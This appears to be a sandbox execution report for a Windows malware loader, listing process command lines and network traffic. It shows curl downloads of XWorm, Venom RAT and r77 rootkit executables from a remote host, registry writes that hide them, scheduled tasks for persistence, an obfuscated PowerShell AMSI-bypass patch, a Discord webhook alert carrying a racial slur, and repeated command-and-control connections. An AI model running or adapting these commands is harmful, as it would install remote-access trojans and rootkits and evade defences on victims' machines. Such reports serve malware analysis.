C:\Windows\system32\curl "https://discord.com/api/webhooks/1250147812503584798/kM-golxLeBjZkcQMdjxFBJ8cEzMjI9zUI-ekNo5GaP0xIAPrgIM71FdqGQFE9zwSksRt" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone"",""embeds"":[{""title"":""Loader Was Ran By Admin!"",""color"":16711680,""author"":{""name"":""Sexy Niggas""},""footer"":{""text"":""UD Loader - Mon 06/17/2024 21:27:15.44""}}],""username"":""UD Loader"",""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3764,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=3800 /prefetch:8

C:\Windows\system32\curl.exe

C:\Windows\system32\curl "https://penisware.com/r77/Install.exe" --output "C:\Windows\Resources\$77-install.exe"

C:\Windows\system32\curl.exe

C:\Windows\system32\curl https://penisware.com/xworm/sdchost.exe --output C:\Windows\Resources\$77-sdchost.exe

C:\Windows\system32\curl.exe

C:\Windows\system32\curl https://penisware.com/venom/scchost.exe --output C:\Windows\Resources\$77-scchost.exe

C:\Windows\system32\curl.exe

C:\Windows\system32\curl https://penisware.com/xworm/penisware-gold.exe --output C:\Windows\Resources\$77-penisware.exe

C:\Windows\system32\curl.exe

C:\Windows\system32\curl https://penisware.com/venom/penisware2.exe --output C:\Windows\Resources\$77-penisware2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-sdchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-sdchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-sdchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-scchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-scchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-scchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-install.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-install.exe

C:\Windows\Resources\$77-sdchost.exe

"C:\Windows\Resources\$77-sdchost.exe"

C:\Windows\Resources\$77-scchost.exe

"C:\Windows\Resources\$77-scchost.exe"

C:\Windows\Resources\$77-penisware.exe

"C:\Windows\Resources\$77-penisware.exe"

C:\Windows\Resources\$77-penisware2.exe

"C:\Windows\Resources\$77-penisware2.exe"

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\Resources\$77-install.exe

"C:\Windows\Resources\$77-install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fRpkfPiAoWEH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NxRCfbzCQiPVFw,[Parameter(Position=1)][Type]$htOeTWhgve)$mOsfbwnsqLV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fle'+[Char](99)+''+'t'+''+[Char](101)+'d'+'D'+'e'+[Char](108)+''+[Char](101)+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+'m'+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yDe'+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'eTy'+'p'+'e','C'+'l'+'a'+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+'b'+'l'+'ic'+','+'S'+'e'+'a'+[Char](108)+'ed,'+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'la'+[Char](115)+'s,'+'A'+'ut'+'o'+''+[Char](67)+''+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$mOsfbwnsqLV.DefineConstructor(''+'R'+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NxRCfbzCQiPVFw).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');$mOsfbwnsqLV.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'k'+'e'+'',''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+''+'c'+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+'New'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$htOeTWhgve,$NxRCfbzCQiPVFw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'ed');Write-Output $mOsfbwnsqLV.CreateType();}$ZzcpjmtgDDhQn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+[Char](109)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+'s'+'o'+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+'e'+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+'e'+''+[Char](77)+''+'e'+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+'s'+'');$batozsqAwesqjz=$ZzcpjmtgDDhQn.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+'roc'+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZMNxjthqpOeSuLgUmWY=fRpkfPiAoWEH @([String])([IntPtr]);$DFpSBJIHUSYKXsKObZKMgf=fRpkfPiAoWEH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XBnSZNJgWfV=$ZzcpjmtgDDhQn.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'el'+'3'+''+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$bihHcKIBTCtPgR=$batozsqAwesqjz.Invoke($Null,@([Object]$XBnSZNJgWfV,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+'L'+''+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$anZRySvjrybvZPMXY=$batozsqAwesqjz.Invoke($Null,@([Object]$XBnSZNJgWfV,[Object](''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+'t'+'')));$JSwBKMs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bihHcKIBTCtPgR,$ZMNxjthqpOeSuLgUmWY).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'dl'+[Char](108)+'');$frbfRBlHuZIjaJheh=$batozsqAwesqjz.Invoke($Null,@([Object]$JSwBKMs,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+'ca'+[Char](110)+''+'B'+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$epLQDxCTqo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($anZRySvjrybvZPMXY,$DFpSBJIHUSYKXsKObZKMgf).Invoke($frbfRBlHuZIjaJheh,[uint32]8,4,[ref]$epLQDxCTqo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$frbfRBlHuZIjaJheh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($anZRySvjrybvZPMXY,$DFpSBJIHUSYKXsKObZKMgf).Invoke($frbfRBlHuZIjaJheh,[uint32]8,0x20,[ref]$epLQDxCTqo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'sta'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp829.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2bce0d73-0c0e-4c8d-afff-048466bba782}

C:\Windows\Resources\$77-penisware2.exe

"C:\Windows\Resources\$77-penisware2.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-penisware" /tr "C:\Users\Admin\AppData\Roaming\$77-penisware.exe"

C:\Users\Admin\AppData\Roaming\$77-scchost.exe

C:\Users\Admin\AppData\Roaming\$77-scchost.exe

C:\Users\Admin\AppData\Roaming\$77-penisware.exe

C:\Users\Admin\AppData\Roaming\$77-penisware.exe

C:\Windows\helppane.exe

C:\Windows\helppane.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4004,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4732,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5052,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5320,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5456,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5580 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5960,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5196,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6112,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=5928,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6304,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6292,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --field-trial-handle=6288,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x258,0x25c,0x260,0x254,0x27c,0x7fffa353ceb8,0x7fffa353cec4,0x7fffa353ced0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2268,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1916,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=3232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4364,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4364,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8

C:\Users\Admin\AppData\Roaming\$77-scchost.exe

C:\Users\Admin\AppData\Roaming\$77-scchost.exe

C:\Users\Admin\AppData\Roaming\$77-penisware.exe

C:\Users\Admin\AppData\Roaming\$77-penisware.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3508,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4460,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4736 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 penisware.com udp
US 104.21.17.92:443 penisware.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 104.21.17.92:443 penisware.com tcp
US 104.21.17.92:443 penisware.com tcp
US 8.8.8.8:53 92.17.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 104.21.17.92:443 penisware.com tcp
US 104.21.17.92:443 penisware.com tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 politics-fiber.gl.at.ply.gg udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 teen-modes.gl.at.ply.gg udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 2.20.12.101:443 bzib.nelreports.net tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 45.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
BE 104.90.25.175:443 www.microsoft.com tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
NL 23.62.61.97:443 th.bing.com udp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.194:443 th.bing.com tcp
NL 23.62.61.194:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 172.165.61.93:443 nav-edge.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 nav-edge.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 147.185.221.19:42571 tcp
NL 23.62.61.194:443 th.bing.com udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 101.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 175.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 93.61.165.172.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.138:443 login.microsoftonline.com tcp
US 8.8.8.8:53 64.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 login.microsoftonline.com udp
US 8.8.8.8:53 services.bingapis.com udp
